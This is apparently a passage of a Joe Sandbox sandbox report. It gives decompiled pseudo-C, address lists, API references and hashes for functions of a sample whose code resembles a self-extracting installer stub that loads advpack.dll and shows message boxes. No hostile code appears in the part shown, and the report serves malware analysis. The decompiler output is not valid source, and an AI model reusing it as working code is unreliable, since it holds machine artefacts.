						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00AC2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00AC2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xac8a38 & 0x00000001;
											if(( *0xac8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lega");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00AC681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lega", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00AC67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00AC28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0xac9a40 = _t119;
						 *0xac8184 = 1;
						 *0xac8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0xac9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0xac8184 = _t135;
							 *0xac8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E00AC44B9(0, _t138);
					L66:
					return E00AC6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x00ac36f9
0x00ac3700
0x00ac370c
0x00ac3716
0x00ac3718
0x00ac371b
0x00ac3721
0x00ac372b
0x00ac373d
0x00ac3745
0x00ac3746
0x00ac3746
0x00ac3749
0x00ac37ab
0x00ac37ad
0x00ac37ae
0x00ac37b3
0x00ac37b8
0x00ac37b8
0x00ac37bf
0x00ac37bf
0x00ac37c5
0x00000000
0x00000000
0x00ac37cb
0x00ac37cd
0x00000000
0x00000000
0x00ac37d5
0x00ac37db
0x00ac37e8
0x00ac37ea
0x00ac37ea
0x00ac37ea
0x00ac37f0
0x00ac37f6
0x00ac3805
0x00ac3817
0x00ac382b
0x00ac3830
0x00ac3836
0x00ac383b
0x00ac383d
0x00ac38eb
0x00ac38eb
0x00ac38f2
0x00ac390c
0x00ac3911
0x00ac3911
0x00ac3913
0x00ac394d
0x00ac394d
0x00ac394f
0x00ac38a9
0x00ac38a9
0x00ac38b0
0x00ac38b2
0x00ac38b9
0x00ac38bb
0x00ac38c1
0x00ac3975
0x00ac38c7
0x00ac38de
0x00ac38e0
0x00ac38e0
0x00ac397b
0x00ac397d
0x00ac39a9
0x00ac397f
0x00ac3982
0x00ac398b
0x00ac398d
0x00ac398f
0x00ac399f
0x00ac39a1
0x00ac3991
0x00ac3991
0x00ac3991
0x00ac398f
0x00ac39af
0x00ac39b6
0x00ac3a0f
0x00ac3a0f
0x00ac3a11
0x00ac3a13
0x00ac3a19
0x00000000
0x00ac39b8
0x00ac39b8
0x00ac39ba
0x00000000
0x00000000
0x00ac39bc
0x00ac39bf
0x00000000
0x00000000
0x00ac39c3
0x00ac39c9
0x00ac39ce
0x00ac39d0
0x00ac39e3
0x00ac39e5
0x00ac39e6
0x00ac39f1
0x00ac39f7
0x00ac39fa
0x00ac3a01
0x00ac3a04
0x00000000
0x00000000
0x00ac3a06
0x00ac3a09
0x00ac3a09
0x00ac3a0b
0x00ac3a0b
0x00000000
0x00ac3a09
0x00ac39fc
0x00000000
0x00ac39fc
0x00ac39d3
0x00ac39d8
0x00ac39da
0x00000000
0x00000000
0x00000000
0x00ac39dc
0x00ac39b6
0x00ac3955
0x00ac395b
0x00000000
0x00000000
0x00ac3961
0x00ac3963
0x00000000
0x00000000
0x00ac3969
0x00ac3969
0x00000000
0x00ac3969
0x00ac3915
0x00ac3915
0x00ac391b
0x00ac391f
0x00000000
0x00000000
0x00ac392d
0x00ac3933
0x00ac3938
0x00ac393a
0x00000000
0x00000000
0x00ac3940
0x00ac3946
0x00ac394b
0x00000000
0x00ac394b
0x00000000
0x00ac38f2
0x00ac3843
0x00ac3845
0x00000000
0x00000000
0x00ac384b
0x00ac384d
0x00ac3883
0x00ac3885
0x00000000
0x00000000
0x00ac389a
0x00ac389e
0x00ac389e
0x00000000
0x00000000
0x00ac38a0
0x00ac38a0
0x00ac38a2
0x00000000
0x00000000
0x00ac38a4
0x00000000
0x00ac38a4
0x00ac384f
0x00ac3851
0x00ac3857
0x00ac386e
0x00ac3877
0x00ac387b
0x00000000
0x00000000
0x00000000
0x00ac3881
0x00ac3859
0x00ac385c
0x00ac3862
0x00ac3866
0x00000000
0x00000000
0x00ac3868
0x00000000
0x00ac38f4
0x00ac38f4
0x00ac38f5
0x00ac38fb
0x00ac3901
0x00ac3901
0x00000000
0x00ac390a
0x00ac374b
0x00ac374e
0x00ac375c
0x00ac3764
0x00ac3769
0x00ac376e
0x00ac3771
0x00ac379c
0x00ac379f
0x00000000
0x00000000
0x00ac37a3
0x00ac37a4
0x00000000
0x00ac37a4
0x00ac3773
0x00ac3777
0x00ac3778
0x00ac377f
0x00ac3781
0x00ac378e
0x00ac378e
0x00ac3794
0x00000000
0x00ac3794
0x00ac3783
0x00000000
0x00000000
0x00ac3785
0x00ac378c
0x00000000
0x00000000
0x00000000
0x00ac378c
0x00ac3750
0x00000000
0x00ac372d
0x00ac372d
0x00ac396b
0x00ac396b
0x00ac396c
0x00ac396e
0x00ac396f
0x00ac3a1e
0x00ac3a1e
0x00ac3a22
0x00ac3a27
0x00ac3a3e
0x00ac3a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00AC3723
MessageBeep.USER32(00000000), ref: 00AC39C3
MessageBoxA.USER32(00000000,00000000,lega,00000030), ref: 00AC39F1

Strings

3, xrefs: 00AC3785
lega, xrefs: 00AC39E9, 00AC3A19

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$lega
API String ID: 2519184315-680046778
Opcode ID: 3f0fc5f5afd1e3b43d2c5da68ea6b12b2480d2f22493ffe8bc8a86bda3d59c25
Instruction ID: 8e56e0684cf50c931eef83bcfc2ab7d01c3ba5d598697c73ba06a5733e65d0f8
Opcode Fuzzy Hash: 3f0fc5f5afd1e3b43d2c5da68ea6b12b2480d2f22493ffe8bc8a86bda3d59c25
Instruction Fuzzy Hash: 7691F372A012249FDF34CB25CD91FAAB3B0BB45344F1781ADD84AAB241DB718F81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00AC6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0xac8004; // 0xc32e3ded
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00AC1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
				_t26 = "advpack.dll";
				E00AC658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00AC6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00ac6495
0x00ac6495
0x00ac64a0
0x00ac64a7
0x00ac64ab
0x00ac64bd
0x00ac64c2
0x00ac64d3
0x00ac64df
0x00ac64e8
0x00ac6502
0x00ac64ee
0x00ac64f9
0x00ac64f9
0x00ac6516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00AC64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00AC64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00AC6502

Strings

advpack.dll, xrefs: 00AC64C2, 00AC64CD, 00AC6501
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC64AC

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
API String ID: 438848745-2284591408
Opcode ID: ce9d1451acbc69a1115aba88e89bef4808e48627f17d4c961b1b8efd7d6ebe86
Instruction ID: 6054f483f5dd3b28452e2a2866a02df24697ce9ef241ca83f9435eac3c67ddfb
Opcode Fuzzy Hash: ce9d1451acbc69a1115aba88e89bef4808e48627f17d4c961b1b8efd7d6ebe86
Instruction Fuzzy Hash: 6601F430A0410CABDB50EBA4DC49FFE7378EB65315F62029DF586A21C0DF709E8ACA51

Uniqueness

Uniqueness Score: -1.00%

Function 00AC28E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00AC2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00AC2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00AC2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x00ac28f1
0x00ac28f4
0x00ac28f7
0x00ac28f9
0x00ac28fc
0x00ac28ff
0x00ac2901
0x00ac2907
0x00ac2a62
0x00ac2a64
0x00ac290d
0x00ac290d
0x00ac290f
0x00ac2912
0x00ac2920
0x00ac2937
0x00000000
0x00000000
0x00ac2944
0x00ac294a
0x00ac294f
0x00ac2a2f
0x00ac2a32
0x00ac2a34
0x00ac2a37
0x00ac2a41
0x00000000
0x00000000
0x00ac2955
0x00ac295e
0x00ac2962
0x00ac2969
0x00ac296f
0x00ac2974
0x00ac298c
0x00ac2a20
0x00ac2a21
0x00ac2a27
0x00ac2a4c
0x00ac2a4f
0x00ac2a50
0x00ac2a53
0x00ac2a56
0x00ac2a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac29b2
0x00ac29b2
0x00ac29b5
0x00ac29bd
0x00ac29c3
0x00ac29cc
0x00ac29d5
0x00ac29d7
0x00ac29da
0x00ac29dd
0x00ac29df
0x00ac29ec
0x00ac29f8
0x00ac29fc
0x00ac29ff
0x00ac2a02
0x00ac2a07
0x00ac2a0a
0x00ac2a0f
0x00ac2a19
0x00ac2a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac2a0f
0x00ac298c
0x00ac2974
0x00ac2962
0x00000000
0x00ac294f
0x00ac2912
0x00ac2a65
0x00ac2a68
0x00ac2a6c
0x00ac2a6f
0x00ac2a6f
0x00ac2a7d

APIs

GlobalFree.KERNEL32 ref: 00AC2A6F

Part of subcall function 00AC2773: CharUpperA.USER32(C32E3DED,00000000,00000000,00000000), ref: 00AC27A8
Part of subcall function 00AC2773: CharNextA.USER32(0000054D), ref: 00AC27B5
Part of subcall function 00AC2773: CharNextA.USER32(00000000), ref: 00AC27BC
Part of subcall function 00AC2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2829
Part of subcall function 00AC2773: RegQueryValueExA.ADVAPI32(?,00AC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2852
Part of subcall function 00AC2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2870
Part of subcall function 00AC2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00AC3938,?,?,?,?,-00000005), ref: 00AC2958
GlobalLock.KERNEL32 ref: 00AC2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AC3938,?,?,?,?,-00000005,?), ref: 00AC2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00AC2A81

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: 44e858c18410ab2fe7e9b7a247d44ea57579d763840027548bd8dd4bc52dc848
Instruction ID: 4e407af654206864ca86809d41446c221f6dc3058f88f8d29e1914dfc59d9c68
Opcode Fuzzy Hash: 44e858c18410ab2fe7e9b7a247d44ea57579d763840027548bd8dd4bc52dc848
Instruction Fuzzy Hash: 57512835E00219EBCB21CF99C884FAEBBB5FF48744F16412EE905E3221DB319941DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00AC4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E00AC468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E00AC468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E00AC44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E00AC44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x00ac417d
0x00ac418f
0x00ac4193
0x00ac41b7
0x00ac41d3
0x00ac41e6
0x00000000
0x00ac41e7
0x00ac41d5
0x00ac41d6
0x00ac41d8
0x00ac41d9
0x00ac41da
0x00ac41df
0x00ac41e1
0x00000000
0x00ac41e1
0x00ac41b9
0x00ac41ba
0x00ac41bc
0x00ac41bd
0x00ac41be
0x00000000
0x00ac41be
0x00000000

APIs

Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00AC30B4), ref: 00AC4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00AC30B4), ref: 00AC41E7

Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554

Strings

FINISHMSG, xrefs: 00AC4173, 00AC41AB
<None>, xrefs: 00AC41C5

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: b709ff242c2d96b62c7223e9173bf55abc4cbdaaf83e37978fc23bbd76a0e4d7
Instruction ID: eb4707605475fef616c528cc74979309fb4f0505c80aff72b904a93ade3feeea
Opcode Fuzzy Hash: b709ff242c2d96b62c7223e9173bf55abc4cbdaaf83e37978fc23bbd76a0e4d7
Instruction Fuzzy Hash: F80121B13002183BF32417654DA6F7B218EDBD97D8F17012DB702E5280CE68CC02017D

Uniqueness

Uniqueness Score: -1.00%

Function 00AC19E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00AC19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0xac8004; // 0xc32e3ded
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E00AC43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0xac9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00AC6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00ac19e0
0x00ac19e0
0x00ac19eb
0x00ac19f2
0x00ac19f9
0x00ac19fc
0x00ac1a01
0x00ac1a2a
0x00ac1a2e
0x00ac1a3e
0x00ac1a4f
0x00ac1a62
0x00ac1a6a
0x00000000
0x00ac1a03
0x00ac1a06
0x00ac1a20
0x00ac1a20
0x00ac1a08
0x00ac1a08
0x00ac1a14
0x00000000
0x00ac1a16
0x00ac1a18
0x00ac1a70
0x00ac1a72
0x00ac1a72
0x00ac1a14
0x00ac1a06
0x00ac1a81

APIs

EndDialog.USER32(?,?), ref: 00AC1A18
GetDesktopWindow.USER32 ref: 00AC1A24
LoadStringA.USER32(?,?,00000200), ref: 00AC1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00AC1A62
MessageBeep.USER32(000000FF), ref: 00AC1A6A

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 1ceb9cb2a352faeaef645a0390878d76f5d1338a4495e6d983e47840a6df36e6
Instruction ID: d201afdff970c59c45833633b6d56bc40a581caa9a262ccebf6468ed8adfef09
Opcode Fuzzy Hash: 1ceb9cb2a352faeaef645a0390878d76f5d1338a4495e6d983e47840a6df36e6
Instruction Fuzzy Hash: 8211A53160110DAFDB10EFA8DE08FBE77B8FF59344F128258F52696191DA349E42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00AC7155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC7155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xac8004; // 0xc32e3ded
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
